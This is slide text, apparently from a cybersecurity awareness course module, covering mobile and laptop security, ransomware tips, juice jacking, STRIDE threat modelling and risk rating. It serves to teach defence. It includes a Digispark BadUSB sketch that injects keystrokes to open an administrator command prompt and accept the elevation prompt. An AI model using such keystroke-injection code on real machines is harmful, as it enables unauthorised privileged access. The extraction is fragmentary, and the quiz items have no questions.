Professional Documents
Culture Documents
Module 4
Module 4
Step 1:
Step 2:
Real life
risks Is drinking the water risky?
● Confidentiality of information
○ Only you can access your bank account statements
● Integrity of information
○ Bank account statement not changed without your approval
● Availability of services
○ Able to access the banking services without disruption
https://www.tnp.sg/news/singapore/think-your-phone-safe-public-wi-fi-think-again
2
1
Phone
Devices
Choose Mobile Do Not Jailbreak Disable
Apps From or Root Devices WiFi/Bluetooth
Trusted Source When Not In
Use
Vertical Institute
• Hacking mobile devices by plugging phones into USB
Vertical Institute
Ransomware on mobile devices
• Never click on unverified links
• Do not open untrusted email attachments
• Only download from sites you trust
• Avoid giving out personal data
• Never use unfamiliar USBs
• Backup your data
Android:
Head to the Apps & notifications menu in
settings and find the Permissions option. If
this isn’t displayed on the main menu, it might
be tucked away in the hamburger icon in the
top right. From here, you can browse through
all the available permissions on your phone, as
well as a quick overview of how many apps
have been granted each permission.
• Head to the Apps & notifications menu in settings and find the Permissions option. If this isn’t displayed
on the main menu, it might be tucked away in the hamburger icon in the top right. From here, you can browse through
all the available permissions on your phone, as well as a quick overview of how many apps have been granted each
permission.
https://www.digitaltrends.com/mobile/ho
w-to-control-ios-app-permissions/
● Financial services company should make it compulsory for their employees to deploy
work profiles to minimise exposure of hacked devices from accessing work data
○ For example, if an employee downloads a rogue application, that rogue application
should not have the permissions to access work data
● Financial services company should ensure that their mobile banking app downloaded by
their customers are restricted for use only if the device is not rooted
○ Rooted devices allow hackers to have deeper access into the phone than
otherwise capable
● Laptop’s hard drive can be taken out of the laptop and plugged into a separate
computer for access
● Find your laptop software
3
2
1
2
#include "DigiKeyboard.h"
void setup()
{
// leave it empty
}void loop()
{
DigiKeyboard.delay(5000); // time is measured in milliseconds
DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT); // open windows menu
DigiKeyboard.delay(1000);
DigiKeyboard.print(“cmd”); // to search for command prompt
DigiKeyboard.delay(1000);
DigiKeyboard.sendKeyStroke(KEY_ENTER, MOD_CONTROL_LEFT | MOD_SHIFT_LEFT);
DigiKeyboard.delay(1000);
DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
for(;;) { } // to stop executing the loop
}
https://www.nbcnews.com/tech/security/juice-jacking-why-you-should-avoid-public-phone-charging-stations-n1132046
Smart home
Smart lock
• Home devices generally have lower security posture than corporate issued devices
• Corporate issued devices are used at home allowing connections attempt from hacked
home devices
• Identify Assets
• Create an Architecture Overview
• Decompose the Application
• Identify the Threats
• Document the Threats
Identifying • Rate the Threats
threats
STRIDE Model
• Spoofing
• Tampering
• Repudiation
• Information Disclosure
• Denial of Service
• Elevation of Privilege
● Weaknesses in your overall environment that can be taken advantage of by a bad actor
● For example:
○ Weak passwords used by a newly launched website
○ Misconfiguration of a system that did not go through the review process
○ Scanner incorrectly identifying email from paper document
Impact
Probability
Catastrophic: 5 Major: 4 Moderate: 3 Minor: 2 Negligible: 1
Frequent: 5 25 20 15 10 5
Occasional: 4 20 16 12 8 4
Remote: 3 15 12 9 6 3
Improbable: 2 10 8 6 4 2
Highly improbable: 1 5 4 3 2 1
Ongoing assessments
Hiring
People
• Are my users aware of
the latest threats?
• Are my customers aware
of phishing attacks?
Technology Process
• Am I equipped with the • Are processes in place
right technology to to safeguard data?
differentiate a user • Are there room for
from a hacker? improvement in my
process?
https://www.mas.gov.sg/-/media/MAS/Regulations-and-Financial-Stability/Regulatory-and-Supervi
sory-Framework/Risk-Management/Internal-Control.pdf
● Control Environment
● Business Process Controls
● Checklist of Sound Practices to Adopt (page 22 to 28)
https://www.semanticscholar.org/paper/Credit-Card-Fraud-Detection-Using-Hidden-Markov-Srivastava-Kundu/841b8acad944c4cd0078fb9bac7ec3be85b607
figure/3
A. True
B. False
A. True
B. False